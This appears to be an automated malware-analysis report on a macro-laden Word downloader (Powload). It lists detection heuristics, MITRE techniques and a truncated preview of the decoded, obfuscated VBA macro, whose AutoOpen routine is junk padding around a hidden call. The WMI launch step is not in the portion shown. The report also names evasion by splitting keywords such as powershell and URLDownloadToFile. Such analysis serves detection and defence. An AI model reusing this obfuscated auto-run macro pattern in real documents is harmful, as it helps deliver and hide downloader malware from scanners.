MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1218.011 System Binary Proxy Execution: Rundll32
The file contains VBA macros with an AutoOpen procedure, so macro code runs as soon as the document is opened. Critical heuristics flag the use of WMI (Win32_Process) to launch a process, a common staging step for downloading and executing further payloads; the ClamAV detection name Doc.Downloader.Powload-6958023-0 supports this. The class name 'Win32_Process' is obfuscated by splitting it across several string literals that are concatenated at runtime, so no single literal contains the keyword.
Heuristics (8)

- ClamAV: Doc.Downloader.Powload-6958023-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Powload-6958023-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen procedure present; it runs automatically when the document is opened.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call present; in VBA this is the usual way to obtain a COM object from a moniker string such as winmgmts:.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (This is the rule's generic wording; for this sample a VBA project was in fact recovered, see Extracted artifacts below.)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard DrawingML schema namespace, not a download location)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44777 bytes |

SHA-256: b365df9524b5e775eaa698288431b9f8b6d9349438009c58128c7ca8710fd669

Preview script (first 1,000 lines of the extracted script; truncated here). Note that everything shown in `autoopen` apart from the bare call `wAUZAA` is padding: each comparison is between undeclared Variants, which are both Empty and therefore equal, so the empty first `If` branch is always taken and the arithmetic in the `ElseIf` branches (which would divide by an Empty operand) never executes. The WMI launch flagged by the heuristics is not in the portion shown.

```vba
Attribute VB_Name = "cQAA1Z"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SQQGZD"
Attribute VB_Base = "0{0A52E058-AE76-4C27-9AF9-3C356DE2D381}{1DC222BD-0E66-44DA-932D-5E1EDD3B3BDE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K4AGAAG"
Attribute VB_Base = "0{3AE5A0E8-9AF3-409E-8AD7-486B476535BE}{D73F20A7-FE73-4D41-93DC-6D2E05722A3C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAwDA_"
Sub autoopen()
If ADDDAUQ = wADAA_4Q Then
ElseIf jAAGA1A = SDABBAZA Then
GABAAAc = (267519638 / 897750405 / sQcAwZ - Cos(756813713 + Tan(EAAAo4)))
ElseIf LQBkZA = pXAAAx Then
cZ4A1AQ = (751133640 / 630216403 / aGABABA - Cos(45757724 + Tan(JD_4AA1A)))
ElseIf DDDDDx = iQAZBCAA Then
ADXcAAD = (135957509 / 149410502 / L_ABG1 - Cos(414211715 + Tan(YADQ_4C)))
End If
If AACAAAAB = NA4QDXZ Then
ElseIf EQ4DAAGA = WcQkGAUw Then
YAU1kAD = (701778413 / 688661393 / Foc1AUA - Cos(296264843 + Tan(tkc1ZZA)))
ElseIf TCcBA1k = TAcAA1AD Then
UAAAAk4G = (400276892 / 985997369 / zAX_4DAA - Cos(16885558 + Tan(sAUZAA)))
ElseIf VUABB_xD = jUAA4wwB Then
LAkAwBAx = (533428355 / 613803216 / jxwDAXD - Cos(5401070 + Tan(tAUAAZ)))
End If
If qXoADAXG = J1oXoAU Then
ElseIf OA_cUUA = UA1QU_B Then
UUAwAAA = (271276750 / 302436636 / vGDZBA - Cos(559905168 + Tan(ZQ_ZUA)))
ElseIf h4AD4A = WAUBBkU Then
dUAQGCA_ = (38677001 / 98134683 / hZG_DAUA - Cos(909608368 + Tan(CDAGAQDD)))
ElseIf ckQDAc = uBA_AAB Then
oZUUA1Q = (23018422 / 696015796 / mCGAUA - Cos(95611544 + Tan(TAADDx)))
End If
wAUZAA
If XoCBQD = YoDXZAA Then
ElseIf dx_XAc = r1xUUABQ Then
MGGQAcA = (601435341 / 716197926 / cA_cDA - Cos(797777708 + Tan(zoUoCA)))
ElseIf EAZAUA = UAoZoB1D Then
cBUAAA = (662716120 / 40666090 / OAADAXQ - Cos(988706587 + Tan(HCA1CxA4)))
ElseIf fA_GZQ = V_ADAA Then
zQBGA1G = (491108569 / 142723745 / GD1kABwA - Cos(245388416 + Tan(iU__Bw)))
End If
If WAAoUAXC = z4AAAB Then
ElseIf OBAUAAX = MZBAAwQA Then
VBZDAkxU = (795838455 / 990537442 / qkQwABU - Cos(102467672 + Tan(V1CA1xA)))
ElseIf lAkDQQQ = HAU1AQG Then
F4CXcwAA = (211428869 / 132033323 / AAAAcUUA - Cos(755302065 + Tan(QACDAkAX)))
ElseIf MQAUQAoA = jGAkGcA Then
zAxGAAA = (32917629 / 159592512 / CCoxQw - Cos(667485931 + Tan(RBUkowG)))
End If
End Sub
Function LoAwGA1A(AQAQcG)
If wAAA4UAk = rBc4cZZG Then
ElseIf GABAAxAA = GcGQAQUA Then
MwAQk_A1 = (569852104 / 893177612 / cABAw4 - Cos(986288814 + Tan(zUQABAXD)))
ElseIf EXwZA_A4 = bQZAA_CC Then
FAAcAZ = (643225345 / 169063010 / zAkkCx - Cos(306331002 + Tan(rAxGUDww)))
ElseIf UwAAkGG1 = UBoAxC Then
UCAAUcD = (180426134 / 100177686 / jA1x_o - Cos(70121657 + Tan(zA1ADcB)))
End If
If qAAQAA = fXQAAxAB Then
ElseIf m4AAAUQc = PQ4cco Then
SAAB4U = (68377651 / 436160027 / uxUQAAx - Cos(844930880 + Tan(WAAA1Q)))
ElseIf iABDAc = YXxxGDAk Then
VAZBCkk = (55184923 / 739573377 / fABUcB - Cos(943206056 + Tan(GUADABB)))
ElseIf CUABUDA = tUwBA_Qo Then
QUQG1Q = (462102489 / 716866647 / fk1UGG - Cos(302115088 + Tan(dZAUkA)))
End If
Set LoAwGA1A = CVar(AQAQcG)
If akoABQBc = GAkAADk Then
ElseIf dABAUoQA = vDU1_UAU Then
iAAAAxB = (89400408 / 203663596 / XADAcGc - Cos(475634290 + Tan(lQXxxA)))
ElseIf FxcZGAAD = TAG4Q1_ Then
d_xDAD = (408372820 / 937147257 / C41AADA - Cos(539471290 + Tan(sAooAk)))
ElseIf FAoQ_AQ = vAUA1A Then
wDAAQQQZ = (408132955 / 451928321 / HAABxBD - Cos(591810695 + Tan(sXwxAZ)))
End If
If uUUZUxZQ = N_AQUAAB Then
ElseIf EDUAA1QA = AwZxAkA Then
kAAUQBQ = (674206449 / 849150678 / uUAAAQcD - Cos(75022217 + Tan(R4
... (truncated)
```